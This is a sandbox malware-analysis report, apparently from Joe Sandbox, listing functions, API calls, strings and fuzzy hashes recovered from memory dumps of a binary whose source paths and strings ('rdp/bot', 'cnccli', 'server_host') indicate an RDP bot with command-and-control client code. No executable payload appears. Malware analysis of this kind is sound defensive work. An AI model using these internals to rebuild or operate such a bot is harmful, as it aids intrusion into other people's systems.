[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE115091E9, 00007FFE11509201
sam3_send_req, xrefs: 00007FFE11509161
mem_alloc, xrefs: 00007FFE115091E2
mem_realloc, xrefs: 00007FFE115091FA
[D] (%s) -> %s, xrefs: 00007FFE11509168

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$Process$AllocFree$fflushfwritestrlen
String ID: [D] (%s) -> %s$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$mem_realloc$sam3_send_req
API String ID: 1135201459-1870638116
Opcode ID: 1e91a4f4fdc315e7e27d561fc3d5643d67a379c9ff2c5bd6a66a50cb92b2c765
Instruction ID: d70b0d94bf0101836433397fb6491dc0878d48b2e86c2903dc3f2abbd3ea812c
Opcode Fuzzy Hash: 1e91a4f4fdc315e7e27d561fc3d5643d67a379c9ff2c5bd6a66a50cb92b2c765
Instruction Fuzzy Hash: 5D31A451A0EE4295FB609B97E8443B92269BF84BE0F5840B8DD0E467B9EE2CE504C300

Function 00007FFE0E16D110 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 105memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE0E16D1AE
GetProcessHeap.KERNEL32 ref: 00007FFE0E16D1E1
HeapAlloc.KERNEL32 ref: 00007FFE0E16D1F2
strcpy.MSVCRT ref: 00007FFE0E16D24B
GetProcessHeap.KERNEL32 ref: 00007FFE0E16D261
HeapFree.KERNEL32 ref: 00007FFE0E16D272

Strings

[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx), xrefs: 00007FFE0E16D1D2
XESS, xrefs: 00007FFE0E16D21E
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E16D287
on_tick_expiry, xrefs: 00007FFE0E16D1CB
-LTCMAS-, xrefs: 00007FFE0E16D202
mem_alloc, xrefs: 00007FFE0E16D280
-LTCSES-, xrefs: 00007FFE0E16D210

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: Heap$Process$AllocFreestrcpystrlen
String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry
API String ID: 925994320-1558387473
Opcode ID: 711575fe787fea8fe66afaf681d5257aa99ee325125eba93f4346aa83786c236
Instruction ID: 45bbc7bd6f863d5935f3cfa0eb40394e9e50792d438222bb1db7b9f00b197065
Opcode Fuzzy Hash: 711575fe787fea8fe66afaf681d5257aa99ee325125eba93f4346aa83786c236
Instruction Fuzzy Hash: 8D418CA1A09A4786FA40AB55E84037927B1BF88B94F55403AEEDE073B7DE7CE945C340

Function 00007FF6BFD644F5 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6BFD64520
strlen.MSVCRT ref: 00007FF6BFD64549
strlen.MSVCRT ref: 00007FF6BFD64555
strlen.MSVCRT ref: 00007FF6BFD6456B

Strings

[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x), xrefs: 00007FF6BFD6464D
fs_path_temp, xrefs: 00007FF6BFD64579, 00007FF6BFD645AC, 00007FF6BFD645DC, 00007FF6BFD6460C, 00007FF6BFD64646
(path_sz != NULL), xrefs: 00007FF6BFD645D5
[I] (%s) -> Done(path=%s,path_sz=%llu), xrefs: 00007FF6BFD64580
((*path_sz) > 0), xrefs: 00007FF6BFD64605
NULL, xrefs: 00007FF6BFD6467F
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6BFD645B3, 00007FF6BFD645E3, 00007FF6BFD64613
(path != NULL), xrefs: 00007FF6BFD645A5
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF6BFD6459E, 00007FF6BFD645CE, 00007FF6BFD645FE

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: strlen
String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
API String ID: 39653677-3852240402
Opcode ID: 46a9fd6f5dbb93ca6dc34309958f871f51596f7697ab3bf8847f5162564302a0
Instruction ID: 2ade13679e0ac96306c0afb5ff190301011b98bbe96b741c4fb1c50c725c1fe0
Opcode Fuzzy Hash: 46a9fd6f5dbb93ca6dc34309958f871f51596f7697ab3bf8847f5162564302a0
Instruction Fuzzy Hash: C0414C61908A47A1FA119FDCA9143F83351BF45788F545332E75E8B2B5EF3CE50A8380

Function 00007FFE133019D9 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 126networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00007FFE13301A84
accept.WS2_32 ref: 00007FFE13301AAB
htonl.WS2_32 ref: 00007FFE13301ADB
htons.WS2_32 ref: 00007FFE13301AEC

Part of subcall function 00007FFE133013F9: ioctlsocket.WS2_32 ref: 00007FFE1330141F

WSAGetLastError.WS2_32 ref: 00007FFE13301B9E
WSAGetLastError.WS2_32 ref: 00007FFE13301BDA

Strings

[E] (%s) -> Failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE13301BED
[W] (%s) -> select timedout(sock=0x%llx), xrefs: 00007FFE13301B7E
[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u), xrefs: 00007FFE13301B35
tcp_accept, xrefs: 00007FFE13301B2E, 00007FFE13301B77, 00007FFE13301BAA, 00007FFE13301BE6
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE13301BB1

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
API String ID: 2278979430-4175654481
Opcode ID: 8cfad7c4b0e55ec5b44f591262298208453b317aa6e890f299361d1c5236cc2b
Instruction ID: 6c704ef07ace6f3ce16726311adacf212a8966cbf82488177c1e2ffbd6108a8f
Opcode Fuzzy Hash: 8cfad7c4b0e55ec5b44f591262298208453b317aa6e890f299361d1c5236cc2b
Instruction Fuzzy Hash: EA51BF75E08E8289E7204B2AE8443BD6260AF65BB4F1403B1D97D276F9EF3DE5458708

Function 00007FFE1150C550 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE1150C63C

Strings

server_host, xrefs: 00007FFE1150C550, 00007FFE1150C554
(name != NULL), xrefs: 00007FFE1150C5C5
ini_get_var, xrefs: 00007FFE1150C599, 00007FFE1150C5CC, 00007FFE1150C5FF, 00007FFE1150C666, 00007FFE1150C6AE
(sec != NULL), xrefs: 00007FFE1150C592
NULL, xrefs: 00007FFE1150C6CE, 00007FFE1150C6D7
(var != NULL), xrefs: 00007FFE1150C5F8
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1150C58B, 00007FFE1150C5BE, 00007FFE1150C5F1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150C5A0, 00007FFE1150C5D3, 00007FFE1150C606
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE1150C6B5
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE1150C66D
cnccli, xrefs: 00007FFE1150C553

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$cnccli$ini_get_var$server_host
API String ID: 1004003707-2347851921
Opcode ID: e26b1e82ba213bdeac2db0122a6682aea35194a75556812099b17318ff97c822
Instruction ID: 3ef29497e7bd9435708a3c5a7a36bb6a96e98401f5c450755d1856f5180a313a
Opcode Fuzzy Hash: e26b1e82ba213bdeac2db0122a6682aea35194a75556812099b17318ff97c822
Instruction Fuzzy Hash: 73414CA2A08E43A2FB358B96ED403F82359BB05368F4855FAD94D466B4DF7CE949C300

Function 00007FFE0EB48AE0 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0EB48BCC

Strings

version, xrefs: 00007FFE0EB48AE0, 00007FFE0EB48AE4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB48B30, 00007FFE0EB48B63, 00007FFE0EB48B96
NULL, xrefs: 00007FFE0EB48C5E, 00007FFE0EB48C67
(var != NULL), xrefs: 00007FFE0EB48B88
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE0EB48C45
ini_get_var, xrefs: 00007FFE0EB48B29, 00007FFE0EB48B5C, 00007FFE0EB48B8F, 00007FFE0EB48BF6, 00007FFE0EB48C3E
(name != NULL), xrefs: 00007FFE0EB48B55
(sec != NULL), xrefs: 00007FFE0EB48B22
main, xrefs: 00007FFE0EB48AE3
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE0EB48BFD
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0EB48B1B, 00007FFE0EB48B4E, 00007FFE0EB48B81

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
API String ID: 1004003707-2349658452
Opcode ID: b94ec3f647cc81143d64c06ba5fad273c4cfac334e6d0cb33bac54ba1e8291a1
Instruction ID: 06b77c3c7681eb53dae9f8ed27ca40066037d47036496841c89b796c070d4e09
Opcode Fuzzy Hash: b94ec3f647cc81143d64c06ba5fad273c4cfac334e6d0cb33bac54ba1e8291a1
Instruction Fuzzy Hash: FE4128A2A09747D6FA399F44E8407F42360FF84348F548536EAED461B5DF7CA589CB00

Function 00007FFE0EC08590 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0EC0867C

Strings

[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE0EC086AD
(sec != NULL), xrefs: 00007FFE0EC085D2
ini_get_var, xrefs: 00007FFE0EC085D9, 00007FFE0EC0860C, 00007FFE0EC0863F, 00007FFE0EC086A6, 00007FFE0EC086EE
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EC085E0, 00007FFE0EC08613, 00007FFE0EC08646
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0EC085CB, 00007FFE0EC085FE, 00007FFE0EC08631
(var != NULL), xrefs: 00007FFE0EC08638
NULL, xrefs: 00007FFE0EC0870E, 00007FFE0EC08717
(name != NULL), xrefs: 00007FFE0EC08605
version, xrefs: 00007FFE0EC08590, 00007FFE0EC08594
main, xrefs: 00007FFE0EC08593
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE0EC086F5

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
API String ID: 1004003707-2349658452
Opcode ID: 15574e2c6d2e1fb85edecffd2d2a439210e27da6631c3faf606f44d1bffa9230
Instruction ID: c15bfa137e634cc4dd857d245af7ba52f5040189427bb8b6a6207b226fde54c7
Opcode Fuzzy Hash: 15574e2c6d2e1fb85edecffd2d2a439210e27da6631c3faf606f44d1bffa9230
Instruction Fuzzy Hash: 44413D62A086C7B6FA588B80F9803F86361BF55348F858572EACD072B5DF7EE545C302

Function 00007FFE0E16C450 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0E16C53C

Strings

ini_get_var, xrefs: 00007FFE0E16C499, 00007FFE0E16C4CC, 00007FFE0E16C4FF, 00007FFE0E16C566, 00007FFE0E16C5AE
(var != NULL), xrefs: 00007FFE0E16C4F8
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E16C4A0, 00007FFE0E16C4D3, 00007FFE0E16C506
(sec != NULL), xrefs: 00007FFE0E16C492
NULL, xrefs: 00007FFE0E16C5CE, 00007FFE0E16C5D7
(name != NULL), xrefs: 00007FFE0E16C4C5
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE0E16C56D
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0E16C48B, 00007FFE0E16C4BE, 00007FFE0E16C4F1
main, xrefs: 00007FFE0E16C453
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE0E16C5B5
version, xrefs: 00007FFE0E16C450, 00007FFE0E16C454

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
API String ID: 1004003707-2349658452
Opcode ID: c069338d6658000d34e45bacf4bdf0188d8b796733ade8e0209c51278b0bb835
Instruction ID: bbcab5e9244ed78a17956093324efe887db5af59465590b7a66326604333b6dc
Opcode Fuzzy Hash: c069338d6658000d34e45bacf4bdf0188d8b796733ade8e0209c51278b0bb835
Instruction Fuzzy Hash: 1D412BF1B09647A6FA108B65E9407F4A360BF44B88F454537EACD461B6EF3CE649C340

Function 00007FFE1150C3C9 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE1150C4BD

Strings

server_host, xrefs: 00007FFE1150C3C9, 00007FFE1150C3CD
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE1150C51B
(name != NULL), xrefs: 00007FFE1150C43E
(sec != NULL), xrefs: 00007FFE1150C471
NULL, xrefs: 00007FFE1150C534
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1150C404, 00007FFE1150C437, 00007FFE1150C46A
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150C419, 00007FFE1150C44C, 00007FFE1150C47F
(ini != NULL), xrefs: 00007FFE1150C40B
ini_get_sec, xrefs: 00007FFE1150C412, 00007FFE1150C445, 00007FFE1150C478, 00007FFE1150C4D6, 00007FFE1150C514
[D] (%s) -> Done(name=%s), xrefs: 00007FFE1150C4DD
cnccli, xrefs: 00007FFE1150C3CC

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$cnccli$ini_get_sec$server_host
API String ID: 1004003707-1509792781
Opcode ID: f792173b0e578962ef9365bfd6f3c26f9cd031187eb4373aed34ba9aa0a52550
Instruction ID: f3339fa06efa0be0a890af10cb65f45a9839e9815ebde56035c5f98f15e8d9c4
Opcode Fuzzy Hash: f792173b0e578962ef9365bfd6f3c26f9cd031187eb4373aed34ba9aa0a52550
Instruction Fuzzy Hash: C34144A1A08E47A2FB219F93E8417B82359BF01379F4445FADA0D5A6B5DF7CE946C300

Function 00007FFE0EC08409 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0EC084FD

Strings

(sec != NULL), xrefs: 00007FFE0EC084B1
[D] (%s) -> Done(name=%s), xrefs: 00007FFE0EC0851D
(ini != NULL), xrefs: 00007FFE0EC0844B
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE0EC0855B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EC08459, 00007FFE0EC0848C, 00007FFE0EC084BF
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0EC08444, 00007FFE0EC08477, 00007FFE0EC084AA
NULL, xrefs: 00007FFE0EC08574
(name != NULL), xrefs: 00007FFE0EC0847E
version, xrefs: 00007FFE0EC08409, 00007FFE0EC0840D
ini_get_sec, xrefs: 00007FFE0EC08452, 00007FFE0EC08485, 00007FFE0EC084B8, 00007FFE0EC08516, 00007FFE0EC08554
main, xrefs: 00007FFE0EC0840C

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
API String ID: 1004003707-693788558
Opcode ID: 0b5434fd82731331c32f89b55454895718f2443e3b4546f6be8949ec3718175f
Instruction ID: a8dde3b8a8a8a1797a92f2c5df2f7f4766913c659597bd1a46e22c4fafa3fb06
Opcode Fuzzy Hash: 0b5434fd82731331c32f89b55454895718f2443e3b4546f6be8949ec3718175f
Instruction Fuzzy Hash: 5F411E62A0C6D7B1FB148B90E9D07B42250AF92398F448176DECD0B5B5DF7EE646C302

Function 00007FFE0E16C2C9 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0E16C3BD

Strings

ini_get_sec, xrefs: 00007FFE0E16C312, 00007FFE0E16C345, 00007FFE0E16C378, 00007FFE0E16C3D6, 00007FFE0E16C414
[D] (%s) -> Done(name=%s), xrefs: 00007FFE0E16C3DD
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E16C319, 00007FFE0E16C34C, 00007FFE0E16C37F
(ini != NULL), xrefs: 00007FFE0E16C30B
(sec != NULL), xrefs: 00007FFE0E16C371
NULL, xrefs: 00007FFE0E16C434
(name != NULL), xrefs: 00007FFE0E16C33E
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0E16C304, 00007FFE0E16C337, 00007FFE0E16C36A
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE0E16C41B
main, xrefs: 00007FFE0E16C2CC
version, xrefs: 00007FFE0E16C2C9, 00007FFE0E16C2CD

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
API String ID: 1004003707-693788558
Opcode ID: fb04181c019cd70a356c0aab54568f0bef338efa7b670cf42f1ecf4a169d6d5e
Instruction ID: 964e6340aafc2f67cf2cbb4e23e8c9e7bf39a4d522465e298b29b8f5faf1e9a5
Opcode Fuzzy Hash: fb04181c019cd70a356c0aab54568f0bef338efa7b670cf42f1ecf4a169d6d5e
Instruction Fuzzy Hash: 7B416AB1A08683A5FA10CB15E9403F86361EF44B88F458537DACD0A5B6EF3DE68AC340

Function 00007FFE11509D6E Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE11509D83
LeaveCriticalSection.KERNEL32 ref: 00007FFE11509E07
GetProcessHeap.KERNEL32 ref: 00007FFE11509E3E
HeapAlloc.KERNEL32 ref: 00007FFE11509E52

Strings

mem_alloc, xrefs: 00007FFE11509E9E
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11509DAF
